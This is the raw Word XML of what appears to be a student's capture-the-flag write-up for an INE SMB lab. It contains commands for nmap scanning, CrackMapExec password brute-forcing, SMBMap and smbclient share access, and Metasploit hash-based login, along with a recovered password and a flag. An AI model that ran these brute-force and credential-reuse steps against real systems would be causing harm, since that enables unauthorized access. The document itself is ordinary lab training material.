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5733" w14:textId="19F1464D" w:rsidR="00853ABF" w:rsidRPr="009775F5" w:rsidRDefault="009775F5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009775F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A17834" w14:textId="77777777" w:rsidR="009775F5" w:rsidRDefault="009775F5"/>
    <w:p w14:paraId="025A1E30" w14:textId="3C2E5D95" w:rsidR="002B4AEB" w:rsidRPr="002B4AEB" w:rsidRDefault="000303A3" w:rsidP="002B4AEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="002B4AEB" w:rsidRPr="002B4AEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ompleting Skill Check Labs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5644C046" w14:textId="77777777" w:rsidR="002B4AEB" w:rsidRPr="002B4AEB" w:rsidRDefault="002B4AEB" w:rsidP="002B4AEB">
      <w:r w:rsidRPr="002B4AEB">
        <w:t xml:space="preserve">Skill Check Labs are interactive, hands-on exercises designed to validate the knowledge and skills you’ve gained in this course through real-world scenarios. Each lab presents practical tasks that require you to apply what you’ve learned. Unlike other INE labs, solutions are not provided, challenging you to demonstrate </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002B4AEB">
        <w:t>your</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002B4AEB">
        <w:t xml:space="preserve"> understanding and problem-solving abilities. Your performance is graded, allowing you to track progress and measure skill growth over time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2691170C" w14:textId="77777777" w:rsidR="002B4AEB" w:rsidRPr="002B4AEB" w:rsidRDefault="002B4AEB" w:rsidP="002B4AEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4AEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272DFB22" w14:textId="77777777" w:rsidR="002B4AEB" w:rsidRPr="002B4AEB" w:rsidRDefault="002B4AEB" w:rsidP="002B4AEB">
      <w:r w:rsidRPr="002B4AEB">
        <w:t>A target machine is accessible at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002B4AEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002B4AEB">
        <w:t xml:space="preserve">. Identify the services and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B4AEB">
        <w:t>capure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B4AEB">
        <w:t xml:space="preserve"> the flags.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A07FDAD" w14:textId="77777777" w:rsidR="002B4AEB" w:rsidRDefault="002B4AEB" w:rsidP="000303A3">
      <w:r w:rsidRPr="002B4AEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B4AEB">
        <w:t xml:space="preserve"> Looks like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B4AEB">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B4AEB">
        <w:t xml:space="preserve"> user </w:t>
      </w:r>
      <w:r w:rsidRPr="002B4AEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tom</w:t>
      </w:r>
      <w:r w:rsidRPr="002B4AEB">
        <w:t> has not changed his password from a very long time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DA5642" w14:textId="3619D07F" w:rsidR="000303A3" w:rsidRPr="000303A3" w:rsidRDefault="000303A3" w:rsidP="000303A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000303A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AC4AD2" w14:textId="77777777" w:rsidR="00E42634" w:rsidRDefault="00E42634" w:rsidP="000303A3">
      <w:r w:rsidRPr="00E42634">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42634">
        <w:t xml:space="preserve"> to scan for open ports and services using the following </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C02F19" w14:textId="6E8D06BB" w:rsidR="00E42634" w:rsidRDefault="00E42634" w:rsidP="000303A3">
      <w:r w:rsidRPr="00E42634">
        <w:t>Command</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADBCBA9" w14:textId="78AB702E" w:rsidR="000303A3" w:rsidRDefault="00E42634" w:rsidP="000303A3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E42634">
        <w:t>namp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E42634">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E42634">
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E42634">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E42634">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E42634">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E42634">
        <w:t>target.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5EAB313B" w14:textId="754A41C2" w:rsidR="00936EB3" w:rsidRDefault="00936EB3" w:rsidP="000303A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CC9966E" wp14:editId="45094D14">
            <wp:extent cx="5334274" cy="4502381"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="190796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67614" name="Picture 1907967614"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334274" cy="4502381"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0C7262" w14:textId="5D6841F3" w:rsidR="00E42634" w:rsidRDefault="00E42634" w:rsidP="000303A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E42634">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMB service</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42634">
        <w:t> is running on </w:t>
      </w:r>
      <w:r w:rsidRPr="00E42634">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>port 445</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67002995" w14:textId="2CD8ACD6" w:rsidR="009244C4" w:rsidRPr="009244C4" w:rsidRDefault="009244C4" w:rsidP="009244C4">
      <w:r w:rsidRPr="009244C4">
        <w:t>brute-force the password using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009244C4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CrackMapExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for user tom.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C48245B" w14:textId="77777777" w:rsidR="009244C4" w:rsidRPr="009244C4" w:rsidRDefault="009244C4" w:rsidP="009244C4">
      <w:r w:rsidRPr="009244C4">
        <w:t>We can use tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="009244C4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Hydra, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009244C4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CrackMapExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009244C4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, or a Metasploit module</w:t>
      </w:r>
      <w:r w:rsidRPr="009244C4">
        <w:t> for brute-forcing, but in this case, we’ll use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009244C4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CrackMapExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009244C4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B9A694" w14:textId="77777777" w:rsidR="00936EB3" w:rsidRDefault="00936EB3" w:rsidP="000303A3">
      <w:r w:rsidRPr="00936EB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="00936EB3">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EFAD2F" w14:textId="780B61F3" w:rsidR="00E42634" w:rsidRDefault="00936EB3" w:rsidP="000303A3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00936EB3">
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00936EB3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00936EB3">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00936EB3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00936EB3">
        <w:t>target.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00936EB3">
        <w:t xml:space="preserve"> -u tom -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D094F8" w14:textId="07B9C4A2" w:rsidR="000303A3" w:rsidRDefault="00936EB3" w:rsidP="000303A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CB94075" wp14:editId="53D6FE18">
            <wp:extent cx="5810549" cy="1257365"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="49700183"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0183" name="Picture 2" descr="A black background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10549" cy="1257365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3BA48D" w14:textId="77777777" w:rsidR="00936EB3" w:rsidRDefault="00936EB3" w:rsidP="000303A3"/>
    <w:p w14:paraId="3FC9F9EF" w14:textId="6C2BE19E" w:rsidR="00936EB3" w:rsidRDefault="00936EB3" w:rsidP="000303A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00936EB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>tom:</w:t>
      </w:r>
      <w:r w:rsidRPr="00936EB3">
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00936EB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>felipe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04A15001" w14:textId="40D159C5" w:rsidR="00936EB3" w:rsidRDefault="00936EB3" w:rsidP="000303A3">
      <w:r w:rsidRPr="00936EB3">
        <w:t xml:space="preserve">enumerate the shares accessible to Tom and analyze his permissions using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00936EB3">
        <w:t>SMBMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5E2391" w14:textId="7B9597BC" w:rsidR="00936EB3" w:rsidRDefault="00936EB3" w:rsidP="000303A3">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Smbmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -H </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>target.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u tom -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>felipe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="34CB4B02" w14:textId="5FA47334" w:rsidR="00936EB3" w:rsidRPr="002B4AEB" w:rsidRDefault="00936EB3" w:rsidP="000303A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42E47146" wp14:editId="5E75BA11">
            <wp:extent cx="5810549" cy="2946551"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="2039615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1555"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10549" cy="2946551"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1775B5FE" w14:textId="34077FE6" w:rsidR="00936EB3" w:rsidRDefault="00936EB3" w:rsidP="000303A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EC26662" wp14:editId="6CDB9411">
            <wp:extent cx="5759746" cy="3378374"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3695635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3543"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59746" cy="3378374"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB5C517" w14:textId="237BCB9E" w:rsidR="00936EB3" w:rsidRDefault="00936EB3" w:rsidP="000303A3">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Their</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> are</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00936EB3">
        <w:t xml:space="preserve"> three shares with </w:t>
      </w:r>
      <w:r w:rsidRPr="00936EB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>read-only</w:t>
      </w:r>
      <w:r w:rsidRPr="00936EB3">
        <w:t> access, let’s connect to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00936EB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HRDocuments</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00936EB3">
        <w:t> share</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E75857" w14:textId="49589CAB" w:rsidR="00936EB3" w:rsidRDefault="00936EB3" w:rsidP="000303A3"/>
    <w:p w14:paraId="1697C0BF" w14:textId="60ABC4FC" w:rsidR="007943D0" w:rsidRDefault="007943D0" w:rsidP="000303A3">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HRDocuments</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -U tom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737D07B4" w14:textId="0D62D519" w:rsidR="007943D0" w:rsidRDefault="007943D0" w:rsidP="000303A3">
      <w:r>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29029C36" w14:textId="0D4C76B0" w:rsidR="007943D0" w:rsidRDefault="007943D0" w:rsidP="000303A3">
      <w:r>
        <w:t xml:space="preserve">Get </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36385F4C" w14:textId="77777777" w:rsidR="007943D0" w:rsidRDefault="007943D0" w:rsidP="000303A3"/>
    <w:p w14:paraId="179EFEE3" w14:textId="5D550E31" w:rsidR="007943D0" w:rsidRDefault="007943D0" w:rsidP="000303A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="230E4A90" wp14:editId="279B01DD">
            <wp:extent cx="5721644" cy="2876698"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="136964198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41986"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21644" cy="2876698"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1028D64C" w14:textId="77777777" w:rsidR="007943D0" w:rsidRDefault="007943D0" w:rsidP="000303A3"/>
    <w:p w14:paraId="1C79D7CC" w14:textId="61C70D52" w:rsidR="007943D0" w:rsidRDefault="007943D0" w:rsidP="000303A3">
      <w:r>
        <w:t>Cat flag1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD398BB" w14:textId="7F757B42" w:rsidR="007943D0" w:rsidRDefault="007943D0" w:rsidP="000303A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59068AA3" wp14:editId="237EBE47">
            <wp:extent cx="2686188" cy="596931"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1628307116" name="Picture 6" descr="A computer cod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07116" name="Picture 6" descr="A computer code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86188" cy="596931"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F53AE9F" w14:textId="701952DE" w:rsidR="00936EB3" w:rsidRDefault="007943D0" w:rsidP="000303A3">
      <w:r w:rsidRPr="00A67564">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag1:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007943D0">
        <w:t>f11bc14086044c8d9556b6d7478ce107</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C219E6" w14:textId="62AFECB5" w:rsidR="00936EB3" w:rsidRPr="00936EB3" w:rsidRDefault="004402FC" w:rsidP="000303A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1218CC13" wp14:editId="46E7D150">
            <wp:extent cx="3905451" cy="901746"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="737594077" name="Picture 7"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4077" name="Picture 7" descr="A blue backgroun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05451" cy="901746"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="760AA66A" w14:textId="65758A71" w:rsidR="000303A3" w:rsidRDefault="002B4AEB" w:rsidP="000303A3">
      <w:r w:rsidRPr="002B4AEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B4AEB">
        <w:t xml:space="preserve"> Using the NTLM hash list discovered in the previous challenge, can you compromise the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B4AEB">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B4AEB">
        <w:t xml:space="preserve"> user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B4AEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nancy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B4AEB">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC1DE31" w14:textId="77777777" w:rsidR="000303A3" w:rsidRDefault="000303A3" w:rsidP="000303A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000303A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428C97D7" w14:textId="77777777" w:rsidR="00847E9E" w:rsidRPr="00847E9E" w:rsidRDefault="00847E9E" w:rsidP="000303A3"/>
    <w:p w14:paraId="0775E009" w14:textId="223A3BA9" w:rsidR="000303A3" w:rsidRDefault="00847E9E" w:rsidP="000303A3">
      <w:r w:rsidRPr="00847E9E">
        <w:lastRenderedPageBreak/>
        <w:t> use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00847E9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00847E9E">
        <w:t> module scanner/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00847E9E">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00847E9E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00847E9E">
        <w:t>smb_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00847E9E">
        <w:t> to attempt authentication using the leaked NTLM hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3CD2D8" w14:textId="27221821" w:rsidR="00847E9E" w:rsidRDefault="00847E9E" w:rsidP="000303A3">
      <w:r>
        <w:t xml:space="preserve">Start the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD5499F" w14:textId="206D5629" w:rsidR="00847E9E" w:rsidRDefault="00847E9E" w:rsidP="000303A3">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1842A1B2" w14:textId="2ABAA5F1" w:rsidR="00847E9E" w:rsidRDefault="00847E9E" w:rsidP="000303A3">
      <w:r>
        <w:t>Use (0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A4BBC4" w14:textId="2C102D7C" w:rsidR="00847E9E" w:rsidRDefault="00847E9E" w:rsidP="000303A3">
      <w:r>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41905DC3" w14:textId="2AFCB9B0" w:rsidR="00847E9E" w:rsidRDefault="000F69E3" w:rsidP="000303A3">
      <w:r>
        <w:t>Set RHOSTS</w:t>
      </w:r>
      <w:r w:rsidR="00847E9E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E513A1D" w14:textId="35520409" w:rsidR="00847E9E" w:rsidRDefault="00847E9E" w:rsidP="000303A3">
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SMBUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7078369A" w14:textId="71556BBF" w:rsidR="00847E9E" w:rsidRDefault="00847E9E" w:rsidP="000303A3">
      <w:r>
        <w:t>Set PASS_FILE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04825FEC" w14:textId="4CCCFCD9" w:rsidR="00847E9E" w:rsidRDefault="00847E9E" w:rsidP="000303A3">
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Createsession</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EC339E" w14:textId="62ADB471" w:rsidR="00847E9E" w:rsidRDefault="00847E9E" w:rsidP="000303A3">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6941C6D5" w14:textId="12D87E6D" w:rsidR="000F69E3" w:rsidRDefault="000F69E3" w:rsidP="000303A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1676CEED" wp14:editId="675C3BC7">
            <wp:extent cx="5804198" cy="2044805"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1142498423"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8423" name="Picture 9"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04198" cy="2044805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44484104" w14:textId="238160E5" w:rsidR="00847E9E" w:rsidRDefault="000F69E3" w:rsidP="000303A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="356EF108" wp14:editId="166E5AEF">
            <wp:extent cx="5899453" cy="1892397"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1703948392"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8392" name="Picture 8"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99453" cy="1892397"/>
                    </a:xfrm>
